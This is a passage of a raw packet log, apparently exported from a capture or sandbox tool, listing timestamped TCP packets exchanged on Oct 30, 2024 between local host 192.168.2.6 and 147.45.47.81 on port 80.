                                                              Oct 30, 2024 15:44:46.148781061 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148788929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148838997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148871899 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148880005 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148905039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148937941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148947001 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148971081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149019957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149044991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149055004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149089098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149096012 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149123907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149157047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149167061 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149189949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149240017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149241924 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149277925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149311066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149317026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149343967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149380922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149389982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149429083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149463892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149481058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149497986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149532080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149539948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149564981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149599075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149604082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149631023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149667978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149689913 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149701118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149734020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149741888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149766922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149800062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149806023 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149832964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149867058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149874926 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149899960 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149933100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.149959087 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.149966002 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150000095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150027037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150048971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150082111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150093079 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150115967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150149107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150156975 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150197983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150233984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150238991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150266886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150300026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150305986 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150332928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150365114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150388002 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150398016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150429964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150439978 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150463104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150496960 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150521994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150528908 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150562048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150571108 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150593996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150628090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150633097 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150660992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150693893 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150711060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150728941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150762081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150768042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.150796890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.150841951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151057959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151089907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151124954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151133060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151155949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151202917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151209116 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151241064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151274920 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151282072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151356936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151391029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151408911 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151422977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151457071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151468992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151489973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151523113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151540041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151559114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151591063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151599884 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151624918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151658058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151670933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151695013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151743889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151763916 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151778936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.151818991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.151901007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152033091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152066946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152071953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152102947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152143002 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152152061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152185917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152219057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152228117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152270079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152302027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152312994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152335882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152368069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152374983 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152401924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152436018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152460098 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152468920 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152502060 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152523994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152538061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152570009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152595997 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152604103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152637005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152645111 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152672052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152715921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152846098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152894020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152928114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.152935028 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.152980089 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153012991 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153016090 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153044939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153093100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153129101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153132915 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153162003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153172016 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153194904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153228045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153234959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153264999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153300047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153306007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153331995 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153364897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153369904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153398037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153433084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153439045 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153465033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153498888 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153506994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153532982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153570890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153780937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153832912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153867006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153876066 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153899908 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153939962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.153951883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.153984070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154016972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154033899 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154048920 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154084921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154094934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154119015 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154151917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154155970 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154186010 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154242992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154305935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154356956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154390097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154406071 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154439926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154472113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154481888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154505014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154544115 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154553890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154587984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154620886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154628038 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154670954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154705048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154710054 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154736996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154768944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154777050 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154802084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154835939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154839993 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154870033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154902935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154913902 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.154937029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154968977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.154975891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155004025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155044079 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155364990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155416012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155466080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155488968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155499935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155550957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155551910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155586004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155617952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155637026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155651093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155666113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155689955 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155693054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155725002 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155730009 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155740023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155754089 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155771017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155775070 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155786037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155802011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155806065 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155816078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155831099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155837059 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155846119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155862093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.155870914 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.155903101 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.156217098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156267881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156322956 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.156348944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156363964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156388044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156399965 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.156403065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156419039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156434059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156441927 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.156449080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.156469107 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.157326937 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.164084911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164112091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164127111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164141893 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.164164066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164167881 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.164180040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164220095 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.164949894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164975882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.164989948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165016890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165020943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165036917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165052891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165071964 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165085077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165098906 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165102959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165138006 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165251017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165283918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165308952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165323019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165333986 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165360928 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165361881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165374041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165389061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165410042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165595055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165610075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165642977 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165724039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165766001 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165776014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165808916 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165860891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165869951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165910006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165949106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.165951967 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.165980101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.166013956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.166017056 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.166045904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.166080952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.166098118 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167026043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167076111 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167148113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167198896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167231083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167233944 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167283058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167330027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167361975 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167382002 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167417049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167424917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167452097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167484045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167512894 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167534113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167567968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167586088 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167601109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167634010 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167659044 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167682886 CET8049995147.45.47.81192.168.2.6
